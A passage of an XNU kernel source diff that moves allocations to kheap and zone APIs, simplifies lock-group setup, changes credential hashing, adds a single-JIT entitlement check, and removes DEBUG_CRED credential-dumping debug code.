 #endif
-       u_long  hash_key = 0;
-
-       hash_key = kauth_cred_hash((uint8_t *)&cred->cr_posix,
-           sizeof(struct posix_cred),
-           hash_key);
-       hash_key = kauth_cred_hash((uint8_t *)&cred->cr_audit,
-           sizeof(struct au_session),
-           hash_key);
+       uint32_t hash_key = 0;
+
+       hash_key = os_hash_jenkins_update(&cred->cr_posix,
+           sizeof(struct posix_cred), hash_key);
+
+       hash_key = os_hash_jenkins_update(&cred->cr_audit,
+           sizeof(struct au_session), hash_key);
 #if CONFIG_MACF
        if (pcred->cr_flags & CRF_MAC_ENFORCE) {
-               hash_key = kauth_cred_hash((uint8_t *)cred->cr_label,
-                   sizeof(struct label),
-                   hash_key);
+               hash_key = mac_cred_label_hash_update(cred->cr_label, hash_key);
        }
-#endif
+#endif /* CONFIG_MACF */
 
+       hash_key = os_hash_jenkins_finish(hash_key);
        hash_key %= KAUTH_CRED_TABLE_SIZE;
        return &kauth_cred_table_anchor[hash_key];
 }
 
 
-#ifdef DEBUG_CRED
-/*
- * kauth_cred_print
- *
- * Description:        Print out an individual credential's contents for debugging
- *             purposes
- *
- * Parameters: cred                            The credential to print out
- *
- * Returns:    (void)
- *
- * Implicit returns:   Results in console output
- */
-void
-kauth_cred_print(kauth_cred_t cred)
-{
-       int     i;
-
-       printf("%p - refs %lu flags 0x%08x uids e%d r%d sv%d gm%d ", cred, cred->cr_ref, cred->cr_flags, cred->cr_uid, cred->cr_ruid, cred->cr_svuid, cred->cr_gmuid);
-       printf("group count %d gids ", cred->cr_ngroups);
-       for (i = 0; i < NGROUPS; i++) {
-               if (i == 0) {
-                       printf("e");
-               }
-               printf("%d ", cred->cr_groups[i]);
-       }
-       printf("r%d sv%d ", cred->cr_rgid, cred->cr_svgid);
-       printf("auditinfo_addr %d %d %d %d %d %d\n",
-           cred->cr_audit.s_aia_p->ai_auid,
-           cred->cr_audit.as_mask.am_success,
-           cred->cr_audit.as_mask.am_failure,
-           cred->cr_audit.as_aia_p->ai_termid.at_port,
-           cred->cr_audit.as_aia_p->ai_termid.at_addr[0],
-           cred->cr_audit.as_aia_p->ai_asid);
-}
-
-int
-is_target_cred( kauth_cred_t the_cred )
-{
-       if (the_cred->cr_uid != 0) {
-               return 0;
-       }
-       if (the_cred->cr_ruid != 0) {
-               return 0;
-       }
-       if (the_cred->cr_svuid != 0) {
-               return 0;
-       }
-       if (the_cred->cr_ngroups != 11) {
-               return 0;
-       }
-       if (the_cred->cr_groups[0] != 11) {
-               return 0;
-       }
-       if (the_cred->cr_groups[1] != 81) {
-               return 0;
-       }
-       if (the_cred->cr_groups[2] != 63947) {
-               return 0;
-       }
-       if (the_cred->cr_groups[3] != 80288) {
-               return 0;
-       }
-       if (the_cred->cr_groups[4] != 89006) {
-               return 0;
-       }
-       if (the_cred->cr_groups[5] != 52173) {
-               return 0;
-       }
-       if (the_cred->cr_groups[6] != 84524) {
-               return 0;
-       }
-       if (the_cred->cr_groups[7] != 79) {
-               return 0;
-       }
-       if (the_cred->cr_groups[8] != 80292) {
-               return 0;
-       }
-       if (the_cred->cr_groups[9] != 80) {
-               return 0;
-       }
-       if (the_cred->cr_groups[10] != 90824) {
-               return 0;
-       }
-       if (the_cred->cr_rgid != 11) {
-               return 0;
-       }
-       if (the_cred->cr_svgid != 11) {
-               return 0;
-       }
-       if (the_cred->cr_gmuid != 3475) {
-               return 0;
-       }
-       if (the_cred->cr_audit.as_aia_p->ai_auid != 3475) {
-               return 0;
-       }
-/*
- *       if ( the_cred->cr_audit.as_mask.am_success != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_mask.am_failure != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_aia_p->ai_termid.at_port != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_aia_p->ai_termid.at_addr[0] != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_aia_p->ai_asid != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_flags != 0 )
- *               return( 0 );
- */
-       return -1;  // found target cred
-}
-
-void
-get_backtrace( void )
-{
-       int                             my_slot;
-       void *                  my_stack[MAX_STACK_DEPTH];
-       int                             i, my_depth;
-
-       if (cred_debug_buf_p == NULL) {
-               MALLOC(cred_debug_buf_p, cred_debug_buffer *, sizeof(*cred_debug_buf_p), M_KAUTH, M_WAITOK);
-               bzero(cred_debug_buf_p, sizeof(*cred_debug_buf_p));
-       }
-
-       if (cred_debug_buf_p->next_slot > (MAX_CRED_BUFFER_SLOTS - 1)) {
-               /* buffer is full */
-               return;
-       }
-
-       my_depth = OSBacktrace(&my_stack[0], MAX_STACK_DEPTH);
-       if (my_depth == 0) {
-               printf("%s - OSBacktrace failed \n", __FUNCTION__);
-               return;
-       }
-
-       /* fill new backtrace */
-       my_slot = cred_debug_buf_p->next_slot;
-       cred_debug_buf_p->next_slot++;
-       cred_debug_buf_p->stack_buffer[my_slot].depth = my_depth;
-       for (i = 0; i < my_depth; i++) {
-               cred_debug_buf_p->stack_buffer[my_slot].stack[i] = my_stack[i];
-       }
-
-       return;
-}
-
-
-/* subset of struct ucred for use in sysctl_dump_creds */
-struct debug_ucred {
-       void    *credp;
-       u_long  cr_ref;                         /* reference count */
-       uid_t   cr_uid;                         /* effective user id */
-       uid_t   cr_ruid;                        /* real user id */
-       uid_t   cr_svuid;                       /* saved user id */
-       u_short cr_ngroups;                     /* number of groups in advisory list */
-       gid_t   cr_groups[NGROUPS];     /* advisory group list */
-       gid_t   cr_rgid;                        /* real group id */
-       gid_t   cr_svgid;                       /* saved group id */
-       uid_t   cr_gmuid;                       /* UID for group membership purposes */
-       struct auditinfo_addr cr_audit; /* user auditing data. */
-       void    *cr_label;                      /* MACF label */
-       int             cr_flags;                       /* flags on credential */
-};
-typedef struct debug_ucred debug_ucred;
-
-SYSCTL_PROC(_kern, OID_AUTO, dump_creds, CTLFLAG_RD,
-    NULL, 0, sysctl_dump_creds, "S,debug_ucred", "List of credentials in the cred hash");
-
-/*     accessed by:
- *     err = sysctlbyname( "kern.dump_creds", bufp, &len, NULL, 0 );
- */
-
-static int
-sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req )
-{
-       int                     i, j, counter = 0;
-       int                             error;
-       size_t                  space;
-       kauth_cred_t    found_cred;
-       debug_ucred *   cred_listp;
-       debug_ucred *   nextp;
-
-       /* This is a readonly node. */
-       if (req->newptr != USER_ADDR_NULL) {
-               return EPERM;
-       }
-
-       /* calculate space needed */
-       for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) {
-               TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) {
-                       counter++;
-               }
-       }
-
-       /* they are querying us so just return the space required. */
-       if (req->oldptr == USER_ADDR_NULL) {
-               counter += 10; // add in some padding;
-               req->oldidx = counter * sizeof(debug_ucred);
-               return 0;
-       }
-
-       MALLOC( cred_listp, debug_ucred *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO);
-       if (cred_listp == NULL) {
-               return ENOMEM;
-       }
-
-       /* fill in creds to send back */
-       nextp = cred_listp;
-       space = 0;
-       for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) {
-               TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) {
-                       nextp->credp = found_cred;
-                       nextp->cr_ref = found_cred->cr_ref;
-                       nextp->cr_uid = found_cred->cr_uid;
-                       nextp->cr_ruid = found_cred->cr_ruid;
-                       nextp->cr_svuid = found_cred->cr_svuid;
-                       nextp->cr_ngroups = found_cred->cr_ngroups;
-                       for (j = 0; j < nextp->cr_ngroups; j++) {
-                               nextp->cr_groups[j] = found_cred->cr_groups[j];
-                       }
-                       nextp->cr_rgid = found_cred->cr_rgid;
-                       nextp->cr_svgid = found_cred->cr_svgid;
-                       nextp->cr_gmuid = found_cred->cr_gmuid;
-                       nextp->cr_audit.ai_auid =
-                           found_cred->cr_audit.as_aia_p->ai_auid;
-                       nextp->cr_audit.ai_mask.am_success =
-                           found_cred->cr_audit.as_mask.am_success;
-                       nextp->cr_audit.ai_mask.am_failure =
-                           found_cred->cr_audit.as_mask.am_failure;
-                       nextp->cr_audit.ai_termid.at_port =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_port;
-                       nextp->cr_audit.ai_termid.at_type =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_type;
-                       nextp->cr_audit.ai_termid.at_addr[0] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[0];
-                       nextp->cr_audit.ai_termid.at_addr[1] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[1];
-                       nextp->cr_audit.ai_termid.at_addr[2] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[2];
-                       nextp->cr_audit.ai_termid.at_addr[3] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[3];
-                       nextp->cr_audit.ai_asid =
-                           found_cred->cr_audit.as_aia_p->ai_asid;
-                       nextp->cr_audit.ai_flags =
-                           found_cred->cr_audit.as_aia_p->ai_flags;
-                       nextp->cr_label = found_cred->cr_label;
-                       nextp->cr_flags = found_cred->cr_flags;
-                       nextp++;
-                       space += sizeof(debug_ucred);
-                       if (space > req->oldlen) {
-                               FREE(cred_listp, M_TEMP);
-                               return ENOMEM;
-                       }
-               }
-       }
-       req->oldlen = space;
-       error = SYSCTL_OUT(req, cred_listp, req->oldlen);
-       FREE(cred_listp, M_TEMP);
-       return error;
-}
-
-
-SYSCTL_PROC(_kern, OID_AUTO, cred_bt, CTLFLAG_RD,
-    NULL, 0, sysctl_dump_cred_backtraces, "S,cred_debug_buffer", "dump credential backtrace");
-
-/*     accessed by:
- *     err = sysctlbyname( "kern.cred_bt", bufp, &len, NULL, 0 );
- */
-
-static int
-sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req )
-{
-       int                     i, j;
-       int                             error;
-       size_t                  space;
-       cred_debug_buffer *     bt_bufp;
-       cred_backtrace *        nextp;
-
-       /* This is a readonly node. */
-       if (req->newptr != USER_ADDR_NULL) {
-               return EPERM;
-       }
-
-       if (cred_debug_buf_p == NULL) {
-               return EAGAIN;
-       }
-
-       /* calculate space needed */
-       space = sizeof(cred_debug_buf_p->next_slot);
-       space += (sizeof(cred_backtrace) * cred_debug_buf_p->next_slot);
-
-       /* they are querying us so just return the space required. */
-       if (req->oldptr == USER_ADDR_NULL) {
-               req->oldidx = space;
-               return 0;
-       }
-
-       if (space > req->oldlen) {
-               return ENOMEM;
-       }
-
-       MALLOC( bt_bufp, cred_debug_buffer *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO);
-       if (bt_bufp == NULL) {
-               return ENOMEM;
-       }
-
-       /* fill in backtrace info to send back */
-       bt_bufp->next_slot = cred_debug_buf_p->next_slot;
-       space = sizeof(bt_bufp->next_slot);
-
-       nextp = &bt_bufp->stack_buffer[0];
-       for (i = 0; i < cred_debug_buf_p->next_slot; i++) {
-               nextp->depth = cred_debug_buf_p->stack_buffer[i].depth;
-               for (j = 0; j < nextp->depth; j++) {
-                       nextp->stack[j] = cred_debug_buf_p->stack_buffer[i].stack[j];
-               }
-               space += sizeof(*nextp);
-               nextp++;
-       }
-       req->oldlen = space;
-       error = SYSCTL_OUT(req, bt_bufp, req->oldlen);
-       FREE(bt_bufp, M_TEMP);
-       return error;
-}
-
-#endif  /* DEBUG_CRED */
-
-
 /*
  **********************************************************************
  * The following routines will be moved to a policy_posix.c module at
index c3cc2afa82f30f57d9e2b79b71a5e10d00fb454a..5da291b6a1310f99a7650def588f00273902be10 100644 (file)
@@ -134,8 +134,6 @@ SECURITY_READ_ONLY_LATE(int) cs_library_val_enable = DEFAULT_CS_LIBRARY_VA_ENABL
 #endif /* !SECURE_KERNEL */
 int cs_all_vnodes = 0;
 
-static lck_grp_t *cs_lockgrp;
-
 SYSCTL_INT(_vm, OID_AUTO, cs_force_kill, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_kill, 0, "");
 SYSCTL_INT(_vm, OID_AUTO, cs_force_hard, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_hard, 0, "");
 SYSCTL_INT(_vm, OID_AUTO, cs_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_debug, 0, "");
@@ -195,10 +193,6 @@ cs_init(void)
            sizeof(cs_library_val_enable));
 #endif
 #endif /* !SECURE_KERNEL */
-
-       lck_grp_attr_t *attr = lck_grp_attr_alloc_init();
-       cs_lockgrp = lck_grp_alloc_init("KERNCS", attr);
-       lck_grp_attr_free(attr);
 }
 STARTUP(CODESIGNING, STARTUP_RANK_FIRST, cs_init);
 
@@ -474,7 +468,7 @@ csblob_get_size(struct cs_blob *blob)
 vm_address_t
 csblob_get_addr(struct cs_blob *blob)
 {
-       return blob->csb_mem_kaddr;
+       return (vm_address_t)blob->csb_mem_kaddr;
 }
 
 /*
@@ -1553,7 +1547,7 @@ cs_blob_get(proc_t p, void **out_start, size_t *out_length)
                return 0;
        }
 
-       *out_start = (void *)csblob->csb_mem_kaddr;
+       *out_start = csblob->csb_mem_kaddr;
        *out_length = csblob->csb_mem_size;
 
        return 0;
index 8e7f964f6bbfd6bc4c258b54a03980fdeceea799..8952d0220f16fa32da57d169b7f48e76201b36cb 100644 (file)
 #include <os/atomic_private.h>
 #include <IOKit/IOBSD.h>
 
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
+#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t,
     mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t);
 void ipc_port_release_send(ipc_port_t);
@@ -145,8 +145,6 @@ int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int);
 
 static void fdrelse(struct proc * p, int fd);
 
-extern void file_lock_init(void);
-
 extern kauth_scope_t    kauth_scope_fileop;
 
 /* Conflict wait queue for when selects collide (opaque type) */
@@ -181,6 +179,11 @@ ZONE_DECLARE(fp_zone, "fileproc",
     sizeof(struct fileproc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM);
 ZONE_DECLARE(fdp_zone, "filedesc",
     sizeof(struct filedesc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM);
+/*
+ * If you need accounting for KM_OFILETABL consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_OFILETABL KHEAP_DEFAULT
 
 /*
  * Descriptor management.
@@ -192,9 +195,7 @@ int nfiles;                     /* actual number of open files */
 static const struct fileops uninitops;
 
 os_refgrp_decl(, f_refgrp, "files refcounts", NULL);
-lck_grp_attr_t * file_lck_grp_attr;
-lck_grp_t * file_lck_grp;
-lck_attr_t * file_lck_attr;
+static LCK_GRP_DECLARE(file_lck_grp, "file");
 
 #pragma mark fileglobs
 
@@ -217,7 +218,7 @@ fg_free(struct fileglob *fg)
        if (IS_VALID_CRED(fg->fg_cred)) {
                kauth_cred_unref(&fg->fg_cred);
        }
-       lck_mtx_destroy(&fg->fg_lock, file_lck_grp);
+       lck_mtx_destroy(&fg->fg_lock, &file_lck_grp);
 
 #if CONFIG_MACF
        mac_file_label_destroy(fg);
@@ -396,30 +397,6 @@ check_file_seek_range(struct flock *fl, off_t cur_file_offset)
 }
 
 
-/*
- * file_lock_init
- *
- * Description:        Initialize the file lock group and the uipc and flist locks
- *
- * Parameters: (void)
- *
- * Returns:    void
- *
- * Notes:      Called at system startup from bsd_init().
- */
-void
-file_lock_init(void)
-{
-       /* allocate file lock group attribute and group */
-       file_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       file_lck_grp = lck_grp_alloc_init("file", file_lck_grp_attr);
-
-       /* Allocate file lock attribute */
-       file_lck_attr = lck_attr_alloc_init();
-}
-
-
 void
 proc_dirs_lock_shared(proc_t p)
 {
@@ -1934,11 +1911,8 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval)
                proc_fdunlock(p);
 
                pathlen = MAXPATHLEN;
-               MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK);
-               if (pathbufp == NULL) {
-                       error = ENOMEM;
-                       goto outdrop;
-               }
+               pathbufp = zalloc(ZV_NAMEI);
+
                if ((error = vnode_getwithref(vp)) == 0) {
                        if (uap->cmd == F_GETPATH_NOFIRMLINK) {
                                error = vn_getpath_ext(vp, NULL, pathbufp, &pathlen, VN_GETPATH_NO_FIRMLINK);
@@ -1951,7 +1925,7 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval)
                                error = copyout((caddr_t)pathbufp, argp, pathlen);
                        }
                }
-               FREE(pathbufp, M_TEMP);
+               zfree(ZV_NAMEI, pathbufp);
                goto outdrop;
        }
 
@@ -2612,9 +2586,12 @@ dropboth:
                        .len = CP_MAX_WRAPPEDKEYSIZE,
                };
 
-               MALLOC(k.key, char *, k.len, M_TEMP, M_WAITOK | M_ZERO);
-
-               error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context);
+               k.key = kheap_alloc(KHEAP_TEMP, CP_MAX_WRAPPEDKEYSIZE, Z_WAITOK | Z_ZERO);
+               if (k.key == NULL) {
+                       error = ENOMEM;
+               } else {
+                       error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context);
+               }
 
                vnode_put(vp);
 
@@ -2623,7 +2600,7 @@ dropboth:
                        *retval = k.len;
                }
 
-               FREE(k.key, M_TEMP);
+               kheap_free(KHEAP_TEMP, k.key, CP_MAX_WRAPPEDKEYSIZE);
 
                break;
        }
@@ -3019,11 +2996,8 @@ dropboth:
                proc_fdunlock(p);
 
                pathlen = MAXPATHLEN;
-               MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK);
-               if (pathbufp == NULL) {
-                       error = ENOMEM;
-                       goto outdrop;
-               }
+               pathbufp = zalloc(ZV_NAMEI);
+
                if ((error = vnode_getwithref(vp)) == 0) {
                        int backingstore = 0;
 
@@ -3051,7 +3025,8 @@ dropboth:
                                (void)vnode_put(vp);
                        }
                }
-               FREE(pathbufp, M_TEMP);
+
+               zfree(ZV_NAMEI, pathbufp);
                goto outdrop;
        }
 
@@ -3860,14 +3835,14 @@ fdalloc(proc_t p, int want, int *result)
                        numfiles = (int)lim;
                }
                proc_fdunlock(p);
-               MALLOC(newofiles, struct fileproc **,
-                   numfiles * OFILESIZE, M_OFILETABL, M_WAITOK);
+               newofiles = kheap_alloc(KM_OFILETABL, numfiles * OFILESIZE,
+                   Z_WAITOK);
                proc_fdlock(p);
                if (newofiles == NULL) {
                        return ENOMEM;
                }
                if (fdp->fd_nfiles >= numfiles) {
-                       FREE(newofiles, M_OFILETABL);
+                       kheap_free(KM_OFILETABL, newofiles, numfiles * OFILESIZE);
                        continue;
                }
                newofileflags = (char *) &newofiles[numfiles];
@@ -3890,7 +3865,7 @@ fdalloc(proc_t p, int want, int *result)
                fdp->fd_ofiles = newofiles;
                fdp->fd_ofileflags = newofileflags;
                fdp->fd_nfiles = numfiles;
-               FREE(ofiles, M_OFILETABL);
+               kheap_free(KM_OFILETABL, ofiles, oldnfiles * OFILESIZE);
                fdexpand++;
        }
 }
@@ -4602,7 +4577,7 @@ falloc_withalloc(proc_t p, struct fileproc **resultfp, int *resultfd,
                return ENOMEM;
        }
        fg = zalloc_flags(fg_zone, Z_WAITOK | Z_ZERO);
-       lck_mtx_init(&fg->fg_lock, file_lck_grp, file_lck_attr);
+       lck_mtx_init(&fg->fg_lock, &file_lck_grp, LCK_ATTR_NULL);
 
        os_ref_retain_locked(&fp->fp_iocount);
        os_ref_init_raw(&fg->fg_count, &f_refgrp);
@@ -4880,8 +4855,8 @@ fdcopy(proc_t p, vnode_t uth_cdir)
        }
        proc_fdunlock(p);
 
-       MALLOC(newfdp->fd_ofiles, struct fileproc **,
-           i * OFILESIZE, M_OFILETABL, M_WAITOK);
+       newfdp->fd_ofiles = kheap_alloc(KM_OFILETABL, i * OFILESIZE,
+           Z_WAITOK | Z_ZERO);
        if (newfdp->fd_ofiles == NULL) {
                if (newfdp->fd_cdir) {
                        vnode_rele(newfdp->fd_cdir);
@@ -4893,7 +4868,6 @@ fdcopy(proc_t p, vnode_t uth_cdir)
                zfree(fdp_zone, newfdp);
                return NULL;
        }
-       (void) memset(newfdp->fd_ofiles, 0, i * OFILESIZE);
        proc_fdlock(p);
 
        newfdp->fd_ofileflags = (char *) &newfdp->fd_ofiles[i];
@@ -4960,8 +4934,8 @@ fdcopy(proc_t p, vnode_t uth_cdir)
        newfdp->fd_kqhash = NULL;
        newfdp->fd_kqhashmask = 0;
        newfdp->fd_wqkqueue = NULL;
-       lck_mtx_init(&newfdp->fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr);
-       lck_mtx_init(&newfdp->fd_knhashlock, proc_knhashlock_grp, proc_lck_attr);
+       lck_mtx_init(&newfdp->fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr);
+       lck_mtx_init(&newfdp->fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr);
 
        return newfdp;
 }
@@ -5027,7 +5001,7 @@ fdfree(proc_t p)
                                proc_fdlock(p);
                        }
                }
-               FREE(fdp->fd_ofiles, M_OFILETABL);
+               kheap_free(KM_OFILETABL, fdp->fd_ofiles, fdp->fd_nfiles * OFILESIZE);
                fdp->fd_ofiles = NULL;
                fdp->fd_nfiles = 0;
        }
@@ -5060,8 +5034,8 @@ fdfree(proc_t p)
                hashdestroy(fdp->fd_kqhash, M_KQUEUE, fdp->fd_kqhashmask);
        }
 
-       lck_mtx_destroy(&fdp->fd_kqhashlock, proc_kqhashlock_grp);
-       lck_mtx_destroy(&fdp->fd_knhashlock, proc_knhashlock_grp);
+       lck_mtx_destroy(&fdp->fd_kqhashlock, &proc_kqhashlock_grp);
+       lck_mtx_destroy(&fdp->fd_knhashlock, &proc_knhashlock_grp);
 
        zfree(fdp_zone, fdp);
 }
@@ -5434,7 +5408,7 @@ sys_fileport_makefd(proc_t p, struct fileport_makefd_args *uap, int32_t *retval)
        int err;
 
        res = ipc_object_copyin(get_task_ipcspace(p->task),
-           send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
 
        if (res == KERN_SUCCESS) {
                err = fileport_makefd(p, port, UF_EXCLOSE, retval);
index 0593bcb08be13b0b6462edbfa863f16ca7cadf2f..f3277df7572e96503a261b5d5decb582b4d36ce9 100644 (file)
@@ -132,7 +132,11 @@ extern int cansignal(struct proc *, kauth_cred_t, struct proc *, int); /* bsd/ke
 
 #define KEV_EVTID(code) BSDDBG_CODE(DBG_BSD_KEVENT, (code))
 
-MALLOC_DEFINE(M_KQUEUE, "kqueue", "memory for kqueue system");
+/*
+ * If you need accounting for KM_KQUEUE consider using
+ * KALLOC_HEAP_DEFINE to define a zone view.
+ */
+#define KM_KQUEUE       KHEAP_DEFAULT
 
 #define KQ_EVENT        NO_EVENT64
 
@@ -3474,8 +3478,8 @@ knotes_dealloc(proc_t p)
                        }
                }
                /* free the table */
-               FREE(fdp->fd_knlist, M_KQUEUE);
-               fdp->fd_knlist = NULL;
+               kheap_free(KM_KQUEUE, fdp->fd_knlist,
+                   fdp->fd_knlistsize * sizeof(struct klist *));
        }
        fdp->fd_knlistsize = 0;
 
@@ -6366,8 +6370,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc,
                                goto out_locked;
                        }
 
-                       MALLOC(list, struct klist *,
-                           size * sizeof(struct klist *), M_KQUEUE, M_WAITOK);
+                       list = kheap_alloc(KM_KQUEUE, size * sizeof(struct klist *),
+                           Z_WAITOK);
                        if (list == NULL) {
                                ret = ENOMEM;
                                goto out_locked;
@@ -6378,7 +6382,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc,
                        bzero((caddr_t)list +
                            fdp->fd_knlistsize * sizeof(struct klist *),
                            (size - fdp->fd_knlistsize) * sizeof(struct klist *));
-                       FREE(fdp->fd_knlist, M_KQUEUE);
+                       kheap_free(KM_KQUEUE, fdp->fd_knlist,
+                           fdp->fd_knlistsize * sizeof(struct klist *));
                        fdp->fd_knlist = list;
                        fdp->fd_knlistsize = size;
                }
@@ -8551,7 +8556,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS
            ROUNDUP64(sizeof(struct xsockstat_n));
        struct kern_event_pcb  *ev_pcb;
 
-       buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO);
+       buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO);
        if (buf == NULL) {
                return ENOMEM;
        }
@@ -8643,10 +8648,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS
 done:
        lck_rw_done(&kev_rwlock);
 
-       if (buf != NULL) {
-               FREE(buf, M_TEMP);
-       }
-
+       kheap_free(KHEAP_TEMP, buf, item_size);
        return error;
 }
 
@@ -8982,10 +8984,7 @@ pid_kqueue_extinfo(proc_t p, struct kqueue *kq, user_addr_t ubuf,
        err = copyout(kqext, ubuf, sizeof(struct kevent_extinfo) * MIN(buflen, nknotes));
 
 out:
-       if (kqext) {
-               kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo));
-               kqext = NULL;
-       }
+       kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo));
 
        if (!err) {
                *retval = (int32_t)MIN(nknotes, PROC_PIDFDKQUEUE_KNOTES_MAX);
index e8a1e25e037127ac3381e9ae9eb6e32983b9fa96..7eef9034fd13d0058124319c105392e24d700f36 100644 (file)
@@ -253,7 +253,7 @@ task_t convert_port_to_task(ipc_port_t port);
 /*
  * Mach things for which prototypes are unavailable from Mach headers
  */
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
+#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
 void            ipc_task_reset(
        task_t          task);
 void            ipc_thread_reset(
@@ -1192,7 +1192,9 @@ grade:
        vm_map_set_user_wire_limit(map, (vm_size_t)proc_limitgetcur(p, RLIMIT_MEMLOCK, FALSE));
 #if XNU_TARGET_OS_OSX
        if (p->p_platform == PLATFORM_IOS) {
-               vm_map_mark_alien(map);
+               assert(vm_map_is_alien(map));
+       } else {
+               assert(!vm_map_is_alien(map));
        }
 #endif /* XNU_TARGET_OS_OSX */
        proc_unlock(p);
@@ -1359,6 +1361,14 @@ grade:
        int cputype = cpu_type();
        vm_map_exec(map, task, load_result.is_64bit_addr, (void *)p->p_fd->fd_rdir, cputype, cpu_subtype, reslide);
 
+#if XNU_TARGET_OS_OSX
+#define SINGLE_JIT_ENTITLEMENT "com.apple.security.cs.single-jit"
+
+       if (IOTaskHasEntitlement(task, SINGLE_JIT_ENTITLEMENT)) {
+               vm_map_single_jit(map);
+       }
+#endif /* XNU_TARGET_OS_OSX */
+
        /*
         * Close file descriptors which specify close-on-exec.
         */
@@ -1780,7 +1790,7 @@ exec_activate_image(struct image_params *imgp)
        /* Use excpath, which contains the copyin-ed exec path */
        DTRACE_PROC1(exec, uintptr_t, excpath);
 
-       MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO);
+       ndp = kheap_alloc(KHEAP_TEMP, sizeof(*ndp), Z_WAITOK | Z_ZERO);
        if (ndp == NULL) {
                error = ENOMEM;
                goto bad_notrans;
@@ -1927,9 +1937,7 @@ bad_notrans:
        if (imgp->ip_ndp) {
                nameidone(imgp->ip_ndp);
        }
-       if (ndp) {
-               FREE(ndp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp));
 
        return error;
 }
@@ -2184,7 +2192,7 @@ exec_handle_port_actions(struct image_params *imgp,
                if (MACH_PORT_VALID(act->new_port)) {
                        kr = ipc_object_copyin(get_task_ipcspace(current_task()),
                            act->new_port, MACH_MSG_TYPE_COPY_SEND,
-                           (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+                           (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
 
                        if (kr != KERN_SUCCESS) {
                                ret = EINVAL;
@@ -2329,7 +2337,8 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags)
                        int mode = psfa->psfaa_openargs.psfao_mode;
                        int origfd;
 
-                       MALLOC(bufp, char *, sizeof(*vap) + sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO);
+                       bufp = kheap_alloc(KHEAP_TEMP,
+                           sizeof(*vap) + sizeof(*ndp), Z_WAITOK | Z_ZERO);
                        if (bufp == NULL) {
                                error = ENOMEM;
                                break;
@@ -2356,7 +2365,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags)
                            fileproc_alloc_init, NULL,
                            &origfd);
 
-                       FREE(bufp, M_TEMP);
+                       kheap_free(KHEAP_TEMP, bufp, sizeof(*vap) + sizeof(*ndp));
 
                        AUDIT_SUBCALL_EXIT(uthread, error);
 
@@ -2411,7 +2420,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags)
 
                        kr = ipc_object_copyin(get_task_ipcspace(current_task()),
                            psfa->psfaa_fileport, MACH_MSG_TYPE_COPY_SEND,
